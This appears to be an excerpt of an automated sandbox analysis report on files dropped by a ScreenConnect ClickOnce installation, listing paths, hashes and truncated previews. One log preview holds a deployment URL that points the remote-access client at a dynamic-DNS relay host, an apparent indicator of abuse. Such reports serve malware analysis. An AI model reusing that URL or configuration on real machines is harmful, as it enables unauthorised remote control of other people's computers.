SSDEEP:	24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
MD5:	1BF0A215F1599E3CEC10004DF6F37304
SHA1:	169E7E91AC3D25D07050284BB9A01CCC20159DE7
SHA-256:	D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
SHA-512:	68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dfsvc.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1662
Entropy (8bit):	5.368796786510097
Encrypted:	false
SSDEEP:	48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
MD5:	F133699E2DFF871CA4DC666762B5A7FF
SHA1:	185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
SHA-256:	9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
SHA-512:	8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.345615485833535
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5:	EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1:	250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256:	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512:	2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\5VTPZWXQ.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (623), with CRLF line terminators
Category:	dropped
Size (bytes):	15016
Entropy (8bit):	3.8067087194552496
Encrypted:	false
SSDEEP:	192:CjiqHzgjvUaujiqHzPMqo0D2E6jiqHzzE8jdLEv:YXCvU3XzMmD2EAXvJdA
MD5:	978815DD42CDCD3C24A7B2B5AB9194CC
SHA1:	48226FE4A42DD9FA35EE45EA83B68B3340927428
SHA-256:	94EAA1C961178C235D465A5C00201C104F533F2E9AF78C6253A6338BBD83E476
SHA-512:	F3FFC6339DDA68E38345646CBC045A4C76A5739C67BE65D12B67CCCC17BA872551144A3D14434E2D082940186150DBDA6303AF557AF143316032E73F27F8527F
Malicious:	false
Preview:	..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.c.l.o.u.d.f.i.l.e.s.-.s.e.c.u.r.e...i.o./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.t.t.y.u.i.o...z.a.p.t.o...o.r.g.&.p.=.8.0.4.1.&.s.=.e.7.6.a.7.0.8.9.-.9.b.d.3.-.4.6.0.c.-.8.e.

C:\Users\user\AppData\Local\Temp\Deployment\4BCE421K.JDM\960OMTRG.J22.application

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63847), with CRLF line terminators
Category:	dropped
Size (bytes):	242016
Entropy (8bit):	5.858471214140723
Encrypted:	false
SSDEEP:	6144:0FcfiVIfQZlENURlENURlENURlENURlENUcmt8vOvP:Oc26UCUCUCUCUh2cP
MD5:	D8259314C0A0D0B11E4979470E4B973A
SHA1:	552BDA7DE4DB0B4DC772C578664DCBDCC9E58D6C
SHA-256:	B8289C61E2C1A1076D4244823E71CD2D877FEA82504B45B0C80753F5BABD9E12
SHA-512:	47A93656BAAAE18242B930BD6F2574E6C62286D965142F2C7DF431B0754F92EE142BC4FD8CA719EB14EB40FE4EDAEB95DBB7ED7528A9B2CCAB34063FD887F3B0
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tr

C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Client.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.58476728626163
Encrypted:	false
SSDEEP:	3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
MD5:	AE0E6EBA123683A59CAE340C894260E9
SHA1:	35A6F5EB87179EB7252131A881A8D5D4D9906013
SHA-256:	D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
SHA-512:	1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(......(....^.(...........%...}....:.(......}....:.(......}....:.(......}......{....:.(......}.....0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o........0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=.....0...........~...%-.&~).....\|...s&...%....(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Client.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1041
Entropy (8bit):	5.147328807370198
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRigeP0AuWvSkcyMuscVSkTo:3FYZ8h9oYgI0AHHMrGTo
MD5:	2EA1AC1E39B8029AA1D1CEBB1079C706
SHA1:	5788C00093D358F8B3D8A98B0BEF5D0703031E3F
SHA-256:	8965728D1E348834E3F1E2502061DFB9DB41478ACB719FE474FA2969078866E7
SHA-512:	6B2A8AC25BBFE4D1EC7B9A9AF8FE7E6F92C39097BCFD7E9E9BE070E1A56718EBEFFFA5B24688754724EDBFFA8C96DCFCAA0C86CC849A203C1F5423E920E64566
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.068776675019683
Encrypted:	false
SSDEEP:	1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
MD5:	0402CF8AE8D04FCC3F695A7BB9548AA0
SHA1:	044227FA43B7654032524D6F530F5E9B608E5BE4
SHA-256:	C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
SHA-512:	BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....^.(...........%...}....:.(......}....:.(......}....:.(......}.....~,...%-.&~+.....i...s....%.,...(...+vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1636
Entropy (8bit):	5.084538887646832
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
MD5:	E11E5D85F8857144751D60CED3FAE6D7
SHA1:	7E0AE834C6B1DEA46B51C3101852AFEEA975D572
SHA-256:	ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
SHA-512:	5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio

C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	95520
Entropy (8bit):	6.505346220942731
Encrypted:	false
SSDEEP:	1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
MD5:	361BCC2CB78C75DD6F583AF81834E447
SHA1:	1E2255EC312C519220A4700A079F02799CCD21D6
SHA-256:	512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
SHA-512:	94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Core.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	548864
Entropy (8bit):	6.031251664661689
Encrypted:	false
SSDEEP:	6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
MD5:	16C4F1E36895A0FA2B4DA3852085547A
SHA1:	AB068A2F4FFD0509213455C79D311F169CD7CAB8
SHA-256:	4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
SHA-512:	AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Core.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.1303806593325705
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onR+geP0Au2vSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0A3GVETDTo
MD5:	2343364BAC7A96205EB525ADDC4BBFD1
SHA1:	9CBA0033ACB4AF447772CD826EC3A9C68D6A3CCC
SHA-256:	E9D6A0964FBFB38132A07425F82C6397052013E43FEEDCDC963A58B6FB9148E7
SHA-512:	AB4D01B599F89FE51B0FFE58FC82E9BA6D2B1225DBE8A3CE98F71DCE0405E2521FCA7047974BAFB6255E675CD9B3D8087D645B7AD33D2C6B47B02B7982076710
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssem

C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Windows.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721856
Entropy (8bit):	6.639136400085158
Encrypted:	false
SSDEEP:	24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
MD5:	9F823778701969823C5A01EF3ECE57B7
SHA1:	DA733F482825EC2D91F9F1186A3F934A2EA21FA1
SHA-256:	ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
SHA-512:	FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Windows.dll.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1982
Entropy (8bit):	5.057585371364542
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRbggeP0AuEvSkcyMuscVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AbHMrGQAXRTFgTo
MD5:	50FC8E2B16CC5920B0536C1F5DD4AEAE
SHA1:	6060C72B1A84B8BE7BAC2ACC9C1CEBD95736F3D6
SHA-256:	95855EF8E55A75B5B0B17207F8B4BA9370CD1E5B04BCD56976973FD4E731454A
SHA-512:	BD40E38CAC8203D8E33F0F7E50E2CAB9CFB116894D6CA2D2D3D369E277D93CDA45A31E8345AFC3039B20DD4118DC8296211BADFFA3F1B81E10D14298DD842D05
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depen

C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsBackstageShell.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	61216
Entropy (8bit):	6.31175789874945
Encrypted:	false
SSDEEP:	1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
MD5:	6DF2DEF5E591E2481E42924B327A9F15
SHA1:	38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
SHA-256:	B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
SHA-512:	5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....^.(.......a...%...}....:.(......}....:.(......}....:.(......}........0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!......0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsBackstageShell.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
